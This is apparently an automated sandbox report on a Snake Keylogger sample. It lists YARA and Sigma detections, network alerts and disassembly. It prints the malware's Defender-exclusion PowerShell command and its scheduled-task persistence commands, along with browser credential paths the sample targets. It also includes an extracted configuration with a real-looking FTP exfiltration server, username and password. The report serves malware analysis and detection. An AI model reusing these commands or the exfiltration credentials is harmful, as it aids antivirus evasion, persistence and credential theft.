10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a26:$a1: get_encryptedPassword 0x35246:$a1: get_encryptedPassword 0x14d12:$a2: get_encryptedUsername 0x35532:$a2: get_encryptedUsername 0x14832:$a3: get_timePasswordChanged 0x35052:$a3: get_timePasswordChanged 0x1492d:$a4: get_passwordField 0x3514d:$a4: get_passwordField 0x14a3c:$a5: set_encryptedPassword 0x3525c:$a5: set_encryptedPassword 0x16060:$a7: get_logins 0x36880:$a7: get_logins 0x15fc3:$a10: KeyLoggerEventArgs 0x367e3:$a10: KeyLoggerEventArgs 0x15c2e:$a11: KeyLoggerEventArgsEventHandler 0x3644e:$a11: KeyLoggerEventArgsEventHandler
10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cbc1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bdf3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba06:$a4: \Orbitum\User Data\Default\Login Data 0x3c226:$a4: \Orbitum\User Data\Default\Login Data 0x1ca45:$a5: \Kometa\User Data\Default\Login Data 0x3d265:$a5: \Kometa\User Data\Default\Login Data
10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155de:$s1: UnHook 0x35dfe:$s1: UnHook 0x155e5:$s2: SetHook 0x35e05:$s2: SetHook 0x155ed:$s3: CallNextHook 0x35e0d:$s3: CallNextHook 0x155fa:$s4: _hook 0x35e1a:$s4: _hook
10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19997:$x1: $%SMTPDV$ 0x3a1b7:$x1: $%SMTPDV$ 0x18378:$x2: $#TheHashHere%& 0x38b98:$x2: $#TheHashHere%& 0x18324:$x3: %FTPDV$ 0x38b44:$x3: %FTPDV$ 0x19a6d:$x4: $%TelegramDv$ 0x3a28d:$x4: $%TelegramDv$ 0x15c2e:$x5: KeyLoggerEventArgs 0x15fc3:$x5: KeyLoggerEventArgs 0x3644e:$x5: KeyLoggerEventArgs 0x367e3:$x5: KeyLoggerEventArgs 0x19963:$m2: Clipboard Logs ID 0x19bbd:$m2: Screenshot Logs ID 0x19ccd:$m2: keystroke Logs ID 0x3a183:$m2: Clipboard Logs ID 0x3a3dd:$m2: Screenshot Logs ID 0x3a4ed:$m2: keystroke Logs ID 0x19fa7:$m3: SnakePW 0x3a7c7:$m3: SnakePW 0x19b95:$m4: \SnakeKeylogger\
0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a26:$a1: get_encryptedPassword 0x35246:$a1: get_encryptedPassword 0x14d12:$a2: get_encryptedUsername 0x35532:$a2: get_encryptedUsername 0x14832:$a3: get_timePasswordChanged 0x35052:$a3: get_timePasswordChanged 0x1492d:$a4: get_passwordField 0x3514d:$a4: get_passwordField 0x14a3c:$a5: set_encryptedPassword 0x3525c:$a5: set_encryptedPassword 0x16060:$a7: get_logins 0x36880:$a7: get_logins 0x15fc3:$a10: KeyLoggerEventArgs 0x367e3:$a10: KeyLoggerEventArgs 0x15c2e:$a11: KeyLoggerEventArgsEventHandler 0x3644e:$a11: KeyLoggerEventArgsEventHandler
0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cbc1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bdf3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba06:$a4: \Orbitum\User Data\Default\Login Data 0x3c226:$a4: \Orbitum\User Data\Default\Login Data 0x1ca45:$a5: \Kometa\User Data\Default\Login Data 0x3d265:$a5: \Kometa\User Data\Default\Login Data
0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155de:$s1: UnHook 0x35dfe:$s1: UnHook 0x155e5:$s2: SetHook 0x35e05:$s2: SetHook 0x155ed:$s3: CallNextHook 0x35e0d:$s3: CallNextHook 0x155fa:$s4: _hook 0x35e1a:$s4: _hook
0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19997:$x1: $%SMTPDV$ 0x3a1b7:$x1: $%SMTPDV$ 0x18378:$x2: $#TheHashHere%& 0x38b98:$x2: $#TheHashHere%& 0x18324:$x3: %FTPDV$ 0x38b44:$x3: %FTPDV$ 0x19a6d:$x4: $%TelegramDv$ 0x3a28d:$x4: $%TelegramDv$ 0x15c2e:$x5: KeyLoggerEventArgs 0x15fc3:$x5: KeyLoggerEventArgs 0x3644e:$x5: KeyLoggerEventArgs 0x367e3:$x5: KeyLoggerEventArgs 0x19963:$m2: Clipboard Logs ID 0x19bbd:$m2: Screenshot Logs ID 0x19ccd:$m2: keystroke Logs ID 0x3a183:$m2: Clipboard Logs ID 0x3a3dd:$m2: Screenshot Logs ID 0x3a4ed:$m2: keystroke Logs ID 0x19fa7:$m3: SnakePW 0x3a7c7:$m3: SnakePW 0x19b95:$m4: \SnakeKeylogger\
0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a26:$a1: get_encryptedPassword 0x35446:$a1: get_encryptedPassword 0x55c66:$a1: get_encryptedPassword 0x14d12:$a2: get_encryptedUsername 0x35732:$a2: get_encryptedUsername 0x55f52:$a2: get_encryptedUsername 0x14832:$a3: get_timePasswordChanged 0x35252:$a3: get_timePasswordChanged 0x55a72:$a3: get_timePasswordChanged 0x1492d:$a4: get_passwordField 0x3534d:$a4: get_passwordField 0x55b6d:$a4: get_passwordField 0x14a3c:$a5: set_encryptedPassword 0x3545c:$a5: set_encryptedPassword 0x55c7c:$a5: set_encryptedPassword 0x16060:$a7: get_logins 0x36a80:$a7: get_logins 0x572a0:$a7: get_logins 0x15fc3:$a10: KeyLoggerEventArgs 0x369e3:$a10: KeyLoggerEventArgs 0x57203:$a10: KeyLoggerEventArgs
0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cdc1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5d5e1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bff3:$a3: \Google\Chrome\User Data\Default\Login Data 0x5c813:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba06:$a4: \Orbitum\User Data\Default\Login Data 0x3c426:$a4: \Orbitum\User Data\Default\Login Data 0x5cc46:$a4: \Orbitum\User Data\Default\Login Data 0x1ca45:$a5: \Kometa\User Data\Default\Login Data 0x3d465:$a5: \Kometa\User Data\Default\Login Data 0x5dc85:$a5: \Kometa\User Data\Default\Login Data
0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155de:$s1: UnHook 0x35ffe:$s1: UnHook 0x5681e:$s1: UnHook 0x155e5:$s2: SetHook 0x36005:$s2: SetHook 0x56825:$s2: SetHook 0x155ed:$s3: CallNextHook 0x3600d:$s3: CallNextHook 0x5682d:$s3: CallNextHook 0x155fa:$s4: _hook 0x3601a:$s4: _hook 0x5683a:$s4: _hook
0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19997:$x1: $%SMTPDV$ 0x3a3b7:$x1: $%SMTPDV$ 0x5abd7:$x1: $%SMTPDV$ 0x18378:$x2: $#TheHashHere%& 0x38d98:$x2: $#TheHashHere%& 0x595b8:$x2: $#TheHashHere%& 0x18324:$x3: %FTPDV$ 0x38d44:$x3: %FTPDV$ 0x59564:$x3: %FTPDV$ 0x19a6d:$x4: $%TelegramDv$ 0x3a48d:$x4: $%TelegramDv$ 0x5acad:$x4: $%TelegramDv$ 0x15c2e:$x5: KeyLoggerEventArgs 0x15fc3:$x5: KeyLoggerEventArgs 0x3664e:$x5: KeyLoggerEventArgs 0x369e3:$x5: KeyLoggerEventArgs 0x56e6e:$x5: KeyLoggerEventArgs 0x57203:$x5: KeyLoggerEventArgs 0x19963:$m2: Clipboard Logs ID 0x19bbd:$m2: Screenshot Logs ID 0x19ccd:$m2: keystroke Logs ID
Click to see the 47 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5392, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", ProcessId: 5964, ProcessName: powershell.exe

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 193.122.6.168, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7200, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 56815

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe, ParentImage: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe, ParentProcessId: 7304, ParentProcessName: WvaGpcFVX.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp", ProcessId: 7552, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5392, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp", ProcessId: 3152, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5392, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", ProcessId: 5964, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5392, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp", ProcessId: 3152, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-06T17:02:46.299399+0100	2803305	3	Unknown Traffic	192.168.2.6	56834	188.114.96.3	443	TCP
2024-11-06T17:02:49.559832+0100	2803305	3	Unknown Traffic	192.168.2.6	56858	188.114.96.3	443	TCP
2024-11-06T17:02:51.072384+0100	2803305	3	Unknown Traffic	192.168.2.6	56868	188.114.96.3	443	TCP
2024-11-06T17:02:52.819631+0100	2803305	3	Unknown Traffic	192.168.2.6	56880	188.114.96.3	443	TCP
2024-11-06T17:02:54.797377+0100	2803305	3	Unknown Traffic	192.168.2.6	56891	188.114.96.3	443	TCP
2024-11-06T17:02:58.359771+0100	2803305	3	Unknown Traffic	192.168.2.6	56914	188.114.96.3	443	TCP
2024-11-06T17:03:01.692771+0100	2803305	3	Unknown Traffic	192.168.2.6	56931	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-06T17:02:44.333550+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	56815	193.122.6.168	80	TCP
2024-11-06T17:02:45.536539+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	56815	193.122.6.168	80	TCP
2024-11-06T17:02:47.224068+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	56841	193.122.6.168	80	TCP
2024-11-06T17:02:48.224050+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	56843	193.122.6.168	80	TCP
2024-11-06T17:02:48.817798+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	56856	193.122.6.168	80	TCP
2024-11-06T17:02:50.288092+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	56843	193.122.6.168	80	TCP
2024-11-06T17:02:52.005298+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	56874	193.122.6.168	80	TCP
2024-11-06T17:02:53.997145+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	56885	193.122.6.168	80	TCP
2024-11-06T17:02:55.724025+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	56897	193.122.6.168	80	TCP

ETPRO MALWARE SnakeKeylogger Exfil via FTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-06T17:02:32.729019+0100	2845532	1	Malware Command and Control Activity Detected	192.168.2.6	50094	50.31.176.103	21	TCP
2024-11-06T17:02:32.729019+0100	2845532	1	Malware Command and Control Activity Detected	192.168.2.6	50114	50.31.176.103	21	TCP

ETPRO MALWARE SnakeKeylogger Exfil via FTP M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-06T17:03:05.137972+0100	2845535	1	Malware Command and Control Activity Detected	192.168.2.6	50102	50.31.176.103	34028	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "FTP", "FTP Server": "ftp://50.31.176.103/", "FTP Username": "somac@gdmaduanas.com", "Password": "HW=f09RQ-BL1", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe

ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: hesaphareketi-01.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: hesaphareketi-01.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: hesaphareketi-01.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:56827 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:56857 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.6:56914 -> 188.114.96.3:443 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:56801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:56922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50270 version: TLS 1.2

Source: hesaphareketi-01.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4x nop then jmp 072401D2h	0_2_07240260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 02B1FA39h	9_2_02B1F778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 02B1E61Fh	9_2_02B1E431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 02B1EFA9h	9_2_02B1E431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_02B1D7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06751011h	9_2_06750D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 067515D8h	9_2_067511C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675D8C1h	9_2_0675D618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675E171h	9_2_0675DEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675EA21h	9_2_0675E778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675B1A9h	9_2_0675AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675BA59h	9_2_0675B7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675BEB1h	9_2_0675BC08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675C761h	9_2_0675C4B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06750751h	9_2_067504A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675F729h	9_2_0675F480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675D011h	9_2_0675CD68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 067515D8h	9_2_06751506
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675DD19h	9_2_0675DA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675B601h	9_2_0675B358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675E5C9h	9_2_0675E320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675EE79h	9_2_0675EBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675C309h	9_2_0675C060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 067502F1h	9_2_06750040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675F2D1h	9_2_0675F028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675FB81h	9_2_0675F8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675CBB9h	9_2_0675C910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06750BB1h	9_2_06750900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0675D469h	9_2_0675D1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 067515D8h	9_2_067511B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 067888EDh	9_2_067885B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06786119h	9_2_06785E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_06783676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06785CC1h	9_2_06785A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_0678FE02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06786571h	9_2_067862C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06786E21h	9_2_06786B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_06783360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_06783350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 067869C9h	9_2_06786720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 067872A2h	9_2_06786FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 067876F9h	9_2_06787450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 067802E9h	9_2_06780040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06780B99h	9_2_067808F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06787B51h	9_2_067878A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06780741h	9_2_06780498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06788401h	9_2_06788158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 067853E9h	9_2_06785140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06787FA9h	9_2_06787D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 06785869h	9_2_067855C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 05371011h	16_2_05370D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 053715D8h	16_2_053711C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537FB81h	16_2_0537F8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537CBB9h	16_2_0537C910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 053715D8h	16_2_05371506
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 05370BB1h	16_2_05370900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537D011h	16_2_0537CD68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 053715D8h	16_2_053711B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537D469h	16_2_0537D1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537F2D1h	16_2_0537F028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537BEB1h	16_2_0537BC08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537C309h	16_2_0537C060
